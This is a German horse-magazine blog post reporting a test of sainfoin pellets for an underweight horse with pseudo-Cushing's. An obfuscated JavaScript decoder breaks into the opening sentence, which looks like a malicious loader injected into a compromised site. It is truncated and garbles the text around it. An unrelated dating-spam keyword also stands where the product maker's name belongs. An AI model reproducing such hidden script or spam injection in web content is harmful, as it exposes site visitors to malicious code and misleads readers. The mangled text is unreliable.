Esparsette im Produkttest: Viel Protein fürs Pferd!

7. Dezember 2016 | Von Redaktion | Kategorie: Aus der Redaktion
Noch sind die Rippen selbst im St<script type=function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand noch gut sichtbar. Das etwas untergewichtige Pferd soll mit Hilfe der Esparsette-Cobs an Gewicht zulegen (Foto: Anke Klabunde).” width=”600″ height=”450″ />

Wir testen nun schon seit geraumer Zeit die Esparsette-Cobs von männer kennenlernen ulm. Vor allem aufgrund des hohen Futterwertes dieser Pflanze in Form von Eiweiß bei gleichzeitig relativ geringen Zuckeranteilen stellt das pelletierte Pferdefutter eine echte Option für schwerfuttrige, (alte) Pferde mit Verdauungsproblemen und/oder Stoffwechselerkrankungen sowie für rekonvaleszente Patienten dar. Das Testpferd leidet unter einer vermutlich inzwischen relativ typischen Zivilisationskrankheit, dem Pseudo-Cushing. Da die „Königin unter den Futterpflanzen“ ohne Stärke auskommt, weist sie für vor allem „wohlstandskranke“, magere Pferde einen echten Mehrwert auf.

Der hohe Proteingehalt zeigt inzwischen seine Wirkung – obgleich das bisher zu dünne Versuchspferd noch nicht wieder im Training ist: Bereits optisch lässt sich eine erste Gewichtszunahme feststellen – wenn auch die Rippen noch leicht zu sehen sind.

Tags: , , , , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=139883

Hier klicken, um einen Kommentar zu schreiben